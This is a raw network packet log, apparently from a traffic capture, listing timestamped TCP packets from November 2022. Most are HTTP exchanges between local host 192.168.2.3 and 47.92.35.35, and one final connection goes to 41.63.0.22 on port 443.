Nov 13, 2022 19:26:52.768966913 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769000053 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769049883 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769067049 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769123077 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769134998 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769176006 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769206047 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769253016 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769274950 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769323111 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769345999 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769395113 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769418001 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769465923 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769485950 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769532919 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769555092 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769603014 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769622087 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769668102 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769690990 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769743919 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769762039 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769809961 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769829988 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769876003 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769896030 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.769942045 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.769963980 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770010948 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770030022 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770075083 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770097017 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770143986 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770165920 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770212889 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770232916 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770278931 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770303965 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770354033 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770370960 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770400047 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770437956 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770484924 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770505905 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770555019 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770576000 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770622015 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770642042 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770688057 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770708084 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770756006 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770776033 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770823002 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770844936 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770891905 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770912886 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.770962000 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.770982027 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771027088 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771048069 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771099091 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771123886 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771147013 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771181107 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771226883 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771248102 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771295071 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771321058 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771378040 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771389008 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771426916 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771457911 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771505117 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771527052 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771573067 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771595001 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771641016 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771663904 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771730900 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771742105 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771778107 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771810055 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771856070 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771878958 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771927118 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.771946907 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.771994114 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772013903 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772058964 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772098064 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772146940 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772169113 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772217989 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772238970 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772285938 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772310972 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772360086 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772381067 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772408009 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772444010 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772495031 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772517920 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772543907 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772567987 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772624016 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772634029 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772672892 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772700071 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772749901 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772767067 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772815943 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772836924 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772887945 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772905111 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.772954941 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.772972107 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.773025036 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.953860044 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.953926086 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.953957081 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954000950 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954021931 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954072952 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954109907 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954142094 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954159021 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954206944 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954229116 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954281092 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954298973 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954343081 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954365969 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954416037 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954435110 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954480886 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954502106 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954552889 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954569101 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954617023 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954633951 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954695940 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954708099 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954756975 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954776049 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954826117 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954840899 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954889059 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.954909086 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954961061 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.954977036 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.955023050 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.955044985 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.955095053 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.955110073 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.955157995 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.955178976 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.955243111 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.140646935 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.140724897 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.140753031 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.140788078 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.140814066 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.140868902 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.140887022 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.140945911 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.140957117 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.140995979 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141027927 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141077995 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141096115 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141144991 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141165018 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141213894 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141236067 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141283989 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141308069 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141351938 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141380072 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141424894 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141448021 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141494989 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141515970 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141561985 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141585112 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141630888 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141654015 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141704082 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141725063 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141772985 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.141793966 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.141839981 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.321877956 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.321944952 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322017908 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322071075 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322129965 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322145939 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322205067 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322223902 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322259903 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322293997 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322314978 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322355986 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322381973 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322432041 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322449923 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322496891 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322519064 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322572947 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322592020 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322638035 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322659016 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322716951 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322729111 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322778940 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322793961 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322846889 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322864056 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322920084 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.322937965 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.322993994 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.323004961 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.323048115 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.323071003 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.323128939 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.323139906 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.323184013 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.512414932 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.512502909 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.512516975 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.512557030 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.512597084 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.512648106 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.512665987 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.512723923 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.512736082 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.512785912 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.512804985 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.512860060 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.512871027 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.512927055 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.512938023 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.512985945 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.513004065 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.513051987 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.513067961 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.513127089 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.513139009 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.513185978 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.513200998 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.513254881 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.513266087 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.513319969 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.513333082 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.513382912 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.513400078 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.513457060 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.513468981 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.513514042 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.777721882 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.778040886 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.962497950 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.962578058 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:53.962639093 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:53.962693930 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.141859055 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.141922951 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.141994953 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.142047882 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.142127037 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.142466068 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.320838928 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.320909977 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.320986032 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.321038008 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.321078062 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.321105003 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.321121931 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.321151018 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.321201086 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.321222067 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.321268082 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.321290970 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.321341991 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.321362972 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.321412086 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.495742083 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.495815992 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.495850086 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.495923042 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.495975971 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496026993 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496087074 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496114969 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496155977 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496217966 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496228933 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496279955 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496301889 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496351957 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496387005 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496424913 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496448040 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496505022 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496530056 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496557951 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496579885 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496639967 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496650934 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496695042 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496717930 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496773005 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.496788979 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.496845007 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.669867992 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.669931889 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.669965982 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670036077 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670090914 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670142889 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670173883 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.670223951 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670241117 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.670291901 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670344114 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670363903 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.670409918 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670464993 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670519114 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670545101 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.670588970 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670627117 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.670658112 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670674086 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.670716047 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:54.670742989 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:54.670780897 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:57.754261971 CET	49701	443	192.168.2.3	41.63.0.22
